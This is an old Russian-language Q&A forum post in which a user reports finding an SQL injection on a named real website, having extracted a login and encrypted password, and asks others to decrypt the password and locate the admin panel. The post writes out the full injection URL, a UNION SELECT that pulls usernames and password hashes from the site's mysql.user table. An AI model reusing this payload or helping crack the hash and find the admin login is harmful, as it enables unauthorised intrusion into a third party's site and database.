Народ вот нашел sql inject нашел логин и пароль но пароль в зашифрованном виде

fara grozniy Ученик (117), на голосовании 15 лет назад
Народ вот нашел sql inject нашел логин и пароль но пароль в зашифрованном виде помогите расшифровать пароль и найти админку
если кто найдет напишите тут или стукните мне в асю отблагодарю 6знаком "592931" А вот и сама ссылка на sql inj. http://www.delea.ch/en/content/eventidettgm.php?Id=63+UNION+SELECT+1,password,3,4,5,6,7,8,user from mysql.user/*
Дополнен 15 лет назад
Голосование за лучший ответ